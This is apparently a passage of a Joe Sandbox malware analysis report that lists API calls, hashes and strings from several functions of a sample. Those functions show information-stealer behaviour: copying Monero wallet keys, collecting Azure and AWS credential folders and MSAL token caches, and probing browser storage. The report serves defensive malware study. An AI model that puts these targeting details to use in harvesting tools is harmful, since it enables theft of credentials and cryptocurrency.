                              • lstrlen.KERNEL32(?), ref: 00E320E4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E32104
                              • lstrcat.KERNEL32(00000000,?), ref: 00E32112
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E32139
                              • lstrlen.KERNEL32(00E61794), ref: 00E3214B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3216B
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E32177
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3219D
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E321A8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E321D4
                              • lstrlen.KERNEL32(?), ref: 00E321EA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3220A
                              • lstrcat.KERNEL32(00000000,?), ref: 00E32218
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E32242
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3227F
                              • lstrlen.KERNEL32(00D2DF58), ref: 00E3228D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E322B1
                              • lstrcat.KERNEL32(00000000,00D2DF58), ref: 00E322B9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E322F7
                              • lstrcat.KERNEL32(00000000), ref: 00E32304
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3232D
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E32356
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E32382
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E323BF
                              • DeleteFileA.KERNEL32(00000000), ref: 00E323F7
                              • FindNextFileA.KERNEL32(00000000,?), ref: 00E32444
                              • FindClose.KERNEL32(00000000), ref: 00E32453
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                              • String ID:
                              • API String ID: 2857443207-0
                              • Opcode ID: 05871a40b7fadcf3f069a63216cddcdc1be18a537cba561f231d4c82037b5009
                              • Instruction ID: 2348dea55db47f67e7738db4694f6e28cd10c75b238eb8bea291a2993ab3a864
                              • Opcode Fuzzy Hash: 05871a40b7fadcf3f069a63216cddcdc1be18a537cba561f231d4c82037b5009
                              • Instruction Fuzzy Hash: 0FE15F31A113169FCB21EFA4D98DAAE7BF9AF44304F046068FA85B7215DB35DD05CBA0
                              Function 00E46410 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E46445
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E46480
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E464AA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E464E1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46506
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E4650E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46537
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FolderPathlstrcat
                              • String ID: \..\
                              • API String ID: 2938889746-4220915743
                              • Opcode ID: fe103978ab3bd7d56ce2ffb46ad1c98afc4f3966c7f1121480c49d5110df9cb9
                              • Instruction ID: 5fd240451bbb20d341798ff44259620712e3647792bb6158775b181f5612494d
                              • Opcode Fuzzy Hash: fe103978ab3bd7d56ce2ffb46ad1c98afc4f3966c7f1121480c49d5110df9cb9
                              • Instruction Fuzzy Hash: E7F1CE70A003059FCB21AF68E84DAAE7BF4AF45308F14A468F995F7255DB38DC45CB92
                              Function 00E44370 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E443A3
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E443D6
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E443FE
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E44409
                              • lstrlen.KERNEL32(\storage\default\), ref: 00E44414
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E44431
                              • lstrcat.KERNEL32(00000000,\storage\default\), ref: 00E4443D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E44466
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E44471
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E44498
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E444D7
                              • lstrcat.KERNEL32(00000000,?), ref: 00E444DF
                              • lstrlen.KERNEL32(00E61794), ref: 00E444EA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E44507
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E44513
                              • lstrlen.KERNEL32(.metadata-v2), ref: 00E4451E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4453B
                              • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00E44547
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4456E
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E445A0
                              • GetFileAttributesA.KERNEL32(00000000), ref: 00E445A7
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E44601
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4462A
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E44653
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4467B
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E446AF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                              • String ID: .metadata-v2$\storage\default\
                              • API String ID: 1033685851-762053450
                              • Opcode ID: 9c6f3ecabcac0d58ccc9c92feada7b7858de3c6908a99fcfd58232f628ee2491
                              • Instruction ID: 893e24141ea10bd683136d54d454e45bc3112655161fdbb955ab8e29d951ed8e
                              • Opcode Fuzzy Hash: 9c6f3ecabcac0d58ccc9c92feada7b7858de3c6908a99fcfd58232f628ee2491
                              • Instruction Fuzzy Hash: 07B16CB1A113059FDB21AF78E849BAE7BE8AF40708F156428F985F7291DB35DD01CB90
                              Function 00E457A0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E457D5
                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E45804
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E45835
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4585D
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E45868
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E45890
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E458C8
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E458D3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E458F8
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4592E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E45956
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E45961
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E45988
                              • lstrlen.KERNEL32(00E61794), ref: 00E4599A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E459B9
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E459C5
                              • lstrlen.KERNEL32(00D2E030), ref: 00E459D4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E459F7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E45A02
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E45A2C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E45A58
                              • GetFileAttributesA.KERNEL32(00000000), ref: 00E45A5F
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E45AB7
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E45B2D
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E45B56
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E45B89
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E45BB5
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E45BEF
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E45C4C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E45C70
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                              • String ID:
                              • API String ID: 2428362635-0
                              • Opcode ID: 717eb8c0033a5e8d06c0e19d4769fa0e9aa07f4ac512f341f40316f198df0a5c
                              • Instruction ID: 1704217bc8c9df8963cd339900241551391b4d60d927335b5c0762be32d644c0
                              • Opcode Fuzzy Hash: 717eb8c0033a5e8d06c0e19d4769fa0e9aa07f4ac512f341f40316f198df0a5c
                              • Instruction Fuzzy Hash: 0602B372A017059FCB21EF68E889AAE7BF5AF44304F14612CF985B7252DB35DC45CB90
                              Function 00E31190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00E31120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E31135
                                • Part of subcall function 00E31120: RtlAllocateHeap.NTDLL(00000000), ref: 00E3113C
                                • Part of subcall function 00E31120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00E31159
                                • Part of subcall function 00E31120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00E31173
                                • Part of subcall function 00E31120: RegCloseKey.ADVAPI32(?), ref: 00E3117D
                              • lstrcat.KERNEL32(?,00000000), ref: 00E311C0
                              • lstrlen.KERNEL32(?), ref: 00E311CD
                              • lstrcat.KERNEL32(?,.keys), ref: 00E311E8
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3121F
                              • lstrlen.KERNEL32(00D28C08), ref: 00E3122D
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31251
                              • lstrcat.KERNEL32(00000000,00D28C08), ref: 00E31259
                              • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00E31264
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31288
                              • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00E31294
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E312BA
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E312FF
                              • lstrlen.KERNEL32(00D2DF58), ref: 00E3130E
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31335
                              • lstrcat.KERNEL32(00000000,?), ref: 00E3133D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31378
                              • lstrcat.KERNEL32(00000000), ref: 00E31385
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E313AC
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 00E313D5
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31401
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3143D
                                • Part of subcall function 00E4EDE0: lstrcpy.KERNEL32(00000000,?), ref: 00E4EE12
                              • DeleteFileA.KERNEL32(?), ref: 00E31471
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                              • String ID: .keys$\Monero\wallet.keys
                              • API String ID: 2881711868-3586502688
                              • Opcode ID: d39a429570629799fe2b53e4589bcd681b9b02bdc93aa0d17a8e18fca5386255
                              • Instruction ID: 05fc6e524dd1467064462daafc483a546c3a7d30d98f3f43c2f5a9ccfb19b9a9
                              • Opcode Fuzzy Hash: d39a429570629799fe2b53e4589bcd681b9b02bdc93aa0d17a8e18fca5386255
                              • Instruction Fuzzy Hash: 7DA16B71A102059BCB21EBA4D88DAAE7BF9AF44304F056468FA85F7251DB35ED05CBA0
                              Function 00E4E720 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 00E4E740
                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00E4E769
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4E79F
                              • lstrcat.KERNEL32(?,00000000), ref: 00E4E7AD
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00E4E7C6
                              • memset.MSVCRT ref: 00E4E805
                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00E4E82D
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4E85F
                              • lstrcat.KERNEL32(?,00000000), ref: 00E4E86D
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00E4E886
                              • memset.MSVCRT ref: 00E4E8C5
                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E4E8F1
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4E920
                              • lstrcat.KERNEL32(?,00000000), ref: 00E4E92E
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00E4E947
                              • memset.MSVCRT ref: 00E4E986
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$memset$FolderPathlstrcpy
                              • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 4067350539-3645552435
                              • Opcode ID: 9207e1a4c036b6cec531ff4c3d97005f0da1c5bc0e6c8afe6ef7642ad9ca3e82
                              • Instruction ID: 498fafb2698c21ae142cb19a33f3c0a6c75ec1acbc21b376b46778f48abe2dda
                              • Opcode Fuzzy Hash: 9207e1a4c036b6cec531ff4c3d97005f0da1c5bc0e6c8afe6ef7642ad9ca3e82
                              • Instruction Fuzzy Hash: A971C871A40318AFDB21EB64DC4AFED77B4BF48704F102898B759BB1C1DAB49A448B94
                              Function 00E4ABB2 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 297stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32 ref: 00E4ABCF
                              • lstrlen.KERNEL32(00D2F338), ref: 00E4ABE5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4AC0D
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E4AC18
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4AC41
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4AC84
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E4AC8E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4ACB7
                              • lstrlen.KERNEL32(00E64AD4), ref: 00E4ACD1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4ACF3
                              • lstrcat.KERNEL32(00000000,00E64AD4), ref: 00E4ACFF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4AD28
                              • lstrlen.KERNEL32(00E64AD4), ref: 00E4AD3A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4AD5C
                              • lstrcat.KERNEL32(00000000,00E64AD4), ref: 00E4AD68
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4AD91
                              • lstrlen.KERNEL32(00D2F140), ref: 00E4ADA7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4ADCF
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E4ADDA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4AE03
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4AE3F
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E4AE49
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4AE6F
                              • lstrlen.KERNEL32(00000000), ref: 00E4AE85
                              • lstrcpy.KERNEL32(00000000,00D2F170), ref: 00E4AEB8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen
                              • String ID: f
                              • API String ID: 2762123234-1993550816
